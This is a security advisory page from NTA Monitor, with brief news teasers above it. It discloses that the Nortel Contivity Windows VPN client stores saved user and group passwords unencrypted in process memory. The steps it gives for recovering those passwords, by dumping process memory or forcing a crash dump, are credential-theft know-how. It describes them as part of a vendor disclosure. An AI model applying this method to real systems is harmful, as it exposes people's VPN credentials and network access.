NTA Monitor

Latest News

Finance industry faces serious IT security issues

23rd June 2008 The finance industry needs to keep its eye on the small change as well as the bigger picture of its security vulnerabilities Read More

Retail sector faces serious IT security issues

23rd June 2008 The retail sector needs to set out its stall and ring the changes in its security vulnerabilities if it is to avoid the potential for hackers to gain unauthorised system access and disrupt service availability Read More

IT managers have more security headaches to deal with

11th May 2008 NTA Monitor's 2008 Annual Security Report has revealed that the average number of vulnerabilities found per test have increased to 21 compared with 19 in 2007 Read More

Solutions not excuses for patch management warns NTA Monitor

23rd April 2008 Patch management is a vital security requirement for any organsation Read More

Nortel Windows VPN client password disclosure

NTA Monitor have discovered a password disclosure issue in the Nortel Windows VPN client: The Nortel VPN client stores the VPN passwords in an obfuscated form in the Windows registry, but it also stores the unencrypted passwords in process memory. Both the user password and the group password (if group authentication is being used) are visible.

This issue occurs when either "Username and Password Authentication" or "Group Security Authentication" are used, and the user selects the "Save Password" option. The "Digital Certificate Authentication" method is not affected.

Overview

While performing a VPN test for a customer in October 2004, NTA Monitor discovered that the VPN client that was being used stored the VPN password (pre-shared key) unencrypted in the memory of the process "Extranet.exe". It was possible to recover the password by dumping the process memory to a file with PMDump or by crashing the system to obtain a physical memory dump using a crash on demand utility such as Bang.

In the memory dump, the plain-text passwords appear near to the associated user name or group name, which makes them easy to locate. It would be simple to write a tool to extract the user name, group name and associated passwords from a memory dump file.

The vulnerability allows anyone with access to the client system to obtain the password. It may also allow anyone who has access to the obfuscated password in the client registry to use the VPN client to obtain the corresponding plain-text password, although this has not been tested.

The issue was found in version 5.01 of the Windows Contivity VPN client, dated October 2004. It is suspect that earlier versions are also vulnerable, although this has not been tested. The Linux version of the Multi-OS client does not appear to be vulnerable, because it does not seem to allow the password to be saved. Presumably the Multi-OS clients for other operating systems (MacOS, HP-UX, Etc.) are also not vulnerable.

Details

Below is a screenshot of the VPN client application, which is used to configure the VPN client. Part of the configuration is the user name and password. In this example, we use the user name "royhills@hotmail.com" and the password "Str0ng$Passw0rd", and we have selected the "Save Password" checkbox.

[Security Policy]

It is also possible to configure group authentication in addition to user authentication. In this example, we enable group authentication using the group name "VPN_Users" and the group password "Gr0up$Passw0rd".

[Entering PSK]

The user password and group password are stored in the registry in an obfuscated format. Below is a screenshot showing the password registry entries: "Errors" is the user password, and "GroupErrors" is the group password. Presumably these non-obvious names were chosen for obscurity.

[Registry Editor]

The VPN client process is "Extranet.exe", which is shown in the screenshot below.

[Process list]

PMDump can be used to copy the contents of the Extranet.exe process memory to a file as shown below. Alternatively it is possible to crash the operating system to obtain a physical memory dump file, which will also contain the password. The screenshot below shows pmdump being used to generate a process memory dump file.

[Memory Dump]

The process memory dump file can then be viewed to discover the password. In this example, we use Microsoft Word 2000 to view the file. We can see the user name "royhills@hotmail.com", the group name "VPN_Users", the group password "Gr0up$Passw0rd", and the user password "Str0ng$Passw0rd". The names and passwords have been highlighted.

[Viewing a memory dump]

Here is the output from "Help -> About Contivity VPN Client" for the version that we used in our testing:

[About screen on VPN client]

Further Information

This issue is one example of a VPN security flaw that NTA Monitor have discovered while performing VPN security testing. We have also published a white paper which discusses the general security issues that we have found to be associated with remote access IPsec VPNs. You can download a copy of this white paper from the following URL:

http://www.nta-monitor.com/posts/2005/01/vpn-flaws.html

This advisory was first released on 1st March 2005.